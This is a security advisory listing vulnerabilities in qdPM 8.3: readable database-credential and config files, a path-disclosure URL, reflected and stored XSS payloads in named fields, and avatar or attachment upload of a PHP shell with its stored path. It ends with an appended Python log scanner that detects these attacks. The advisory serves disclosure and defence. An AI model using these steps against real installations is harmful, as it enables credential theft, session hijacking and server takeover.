qdPM:				http://qdpm.net/
Version:			8.3
By Ross Marks:		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1. Information Disclosure
	1.1 visit: http://website.com/qdPM/core/config/databases.yml
		by default this file is world-readable and contains configuration information such as database details (host, port, username & password)
	1.2 visit: http://website.com/qdPM/core/log/qdPM_prod.log	
		Publicly readable error logs
	1.3 visit: http://website.com/qdPM/core/apps/qdPM/config/settings.yml
		discloses the csrf_secret key along with other sensitive configuration values
	
2. Full Path Disclosure
	visit: http://website.com/qdPM/index.php/users/info/id/-999
		will return: 
		Fatal error: Call to a member function getName() on a non-object 
		in /path/to/qdPM/core/apps/qdPM/modules/users/templates/infoSuccess.php on line 1
		
3. Reflected XSS
	3.1 visit: http://website.com/qdPM/index.php/users
		POST: search[keywords]=<XSS>
		replace <XSS> with your payload (remember to break out of the enclosing JavaScript with ;</script> first)
	3.2 GET: /qdPM/index.php/skins?setSkin="><XSS>
		
4. Persistent XSS
	4.1 visit: http://website.com/qdPM/index.php/configuration?type=general
			the "Name of application" field is unfiltered (and rendered on every page); put the payload here and save
	4.2 visit: http://website.com/qdPM/index.php/projects
			create a new project with the name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.3 visit: http://website.com/qdPM/index.php/tasks?projects_id=1 <-- any ID
			create a new task with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.4 visit: http://website.com/qdPM/index.php/tickets
			create a new ticket with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.5 visit: http://website.com/qdPM/index.php/discussions
			create a new discussion with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.6 visit: http://website.com/qdPM/index.php/projectReports
			create a new report with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.7 visit: http://website.com/qdPM/index.php/scheduler/personal
			create a new event with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.8 Comments on any of the items in 4.1 - 4.7 are also unfiltered, so JavaScript injected there is rendered as well
5. Arbitrary File Upload
	5.1 visit: http://website.com/qdPM/index.php/myAccount
		use "change avatar" to upload any file type (a PHP shell, for example)
		view the page source for the stored location (a random number is prepended to the file name), e.g. http://website.com/qdPM/uploads/users/248743-shell.php
	5.2 ANY of the pages that accept attachments will allow any file type to be uploaded
		(projects, tasks, tickets, discussions, reports, scheduler)
		the uploaded file has a random number, rand(111111,999999), prepended to its name
		and is stored under: http://website.com/qdPM/uploads/attachments/
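A defender-side check for the issues above, added here as an example and not part of the advisory: a small Python scanner over web-server access logs that flags the section 1 files when they are actually served (200), the negative-id path-disclosure probe from section 2, markup in query values as in section 3, and server-side scripts fetched from the uploads/ directories of section 5. The log lines are constructed for the example and assume the common Apache/nginx combined format; the shell file name reuses the advisory's own example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from a real server); the shell file
# name reuses the advisory's example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /qdPM/index.php/projects HTTP/1.1" 200 8120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /qdPM/core/config/databases.yml HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /qdPM/index.php/users/info/id/-999 HTTP/1.1" 500 301
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /qdPM/index.php/skins?setSkin=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1801
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /qdPM/uploads/users/248743-shell.php HTTP/1.1" 200 77
198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /qdPM/uploads/attachments/512345-report.pdf HTTP/1.1" 200 40211
198.51.100.9 - - [10/Oct/2023:13:56:15 +0000] "GET /qdPM/core/log/qdPM_prod.log HTTP/1.1" 403 199
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Files the advisory lists as world-readable in a default install (section 1)
SENSITIVE_FILES = ("/core/config/databases.yml", "/core/log/qdpm_prod.log",
                   "/core/apps/qdpm/config/settings.yml")
# Server-side script extensions that should never be fetched from uploads/ (section 5)
EXEC_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")
FPD_RE = re.compile(r"/users/info/id/-\d+")  # negative id probe (section 2)
XSS_RE = re.compile(r"<[a-z!/]|\bon\w+\s*=|javascript:", re.IGNORECASE)

def classify(line):
    """Return the names of the rules that fire for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    hits = []
    # 1. sensitive file actually served (200), not merely probed and blocked
    if path.endswith(SENSITIVE_FILES) and m.group("status") == "200":
        hits.append("config-disclosure")
    # 2. negative user id used to trigger the full-path-disclosure fatal error
    if FPD_RE.search(path):
        hits.append("fpd-probe")
    # 3. markup or script in a decoded query value (reflected XSS attempt)
    if any(XSS_RE.search(v) for vals in parse_qs(parts.query).values() for v in vals):
        hits.append("xss-in-query")
    # 4. executable script requested from an upload directory (uploaded shell)
    if "/uploads/" in path and path.endswith(EXEC_EXTENSIONS):
        hits.append("upload-exec")
    return hits

def scan(log_text):
    """Return (rule, request target) pairs for every line that trips a rule."""
    return [(rule, REQUEST_RE.search(line).group("target"))
            for line in log_text.splitlines() for rule in classify(line)]
```

Blocked probes (the 403 on qdPM_prod.log) are deliberately not reported as disclosure; widen rule 1 to any status if you want to see attempts as well as successes.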